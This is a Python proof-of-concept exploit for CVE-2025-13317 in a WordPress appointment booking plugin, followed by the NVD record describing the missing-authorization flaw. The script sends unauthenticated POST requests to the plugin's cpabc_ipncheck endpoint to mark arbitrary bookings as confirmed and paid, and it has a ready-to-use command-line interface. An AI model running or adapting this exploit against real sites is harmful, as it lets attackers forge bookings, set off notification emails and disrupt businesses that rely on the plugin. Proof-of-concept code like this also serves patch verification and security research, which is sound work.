CVE-2025-13317

import requests import sys # CVE-2025-13317 PoC # Missing Authorization in Appointment Booking Calendar < 1.3.97 # Attackers can confirm arbitrary bookings via cpabc_ipncheck parameter def exploit(target_url, booking_id): """ Exploit for CVE-2025-13317 Args: target_url: Target WordPress site URL booking_id: ID of the booking to confirm Returns: Response from the server """ # Target endpoint exposed by the plugin endpoint = f"{target_url}/?cpabc_ipncheck=1" # Malicious payload to confirm arbitrary booking # The endpoint trusts attacker-supplied data without verification data = { 'cpabc_ipncheck': '1', 'booking_id': str(booking_id), 'status': 'confirmed', 'payment_status': 'completed' } # Send request without any authentication try: response = requests.post(endpoint, data=data, timeout=10) return response.text, response.status_code except requests.exceptions.RequestException as e: return f"Error: {str(e)}", None if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python cve-2025-13317.py <target_url> <booking_id>") print("Example: python cve-2025-13317.py http://example.com 12345") sys.exit(1) target = sys.argv[1] booking = sys.argv[2] print(f"[*] Exploiting CVE-2025-13317 on {target}") print(f"[*] Attempting to confirm booking ID: {booking}") result, status = exploit(target, booking) print(f"[*] Response Status: {status}") print(f"[*] Response: {result[:500]}")

{"cve": {"id": "CVE-2025-13317", "sourceIdentifier": "[email protected]", "published": "2025-11-22T08:15:44.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.96. This is due to the plugin exposing an unauthenticated booking processing endpoint (cpabc_appointments_check_IPN_verification) that trusts attacker-supplied payment notifications without verifying their origin, authenticity, or requiring proper authorization checks. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and insert them into the live calendar via the 'cpabc_ipncheck' parameter, triggering administrative and customer notification emails and disrupting operations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L363", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L476", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399113%40appointment-booking-calendar&new=3399113%40appointment-booking-calendar&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/638217c4-7a37-49e4-8660-5510ace692ec?source=cve", "source": "[email protected]"}]}}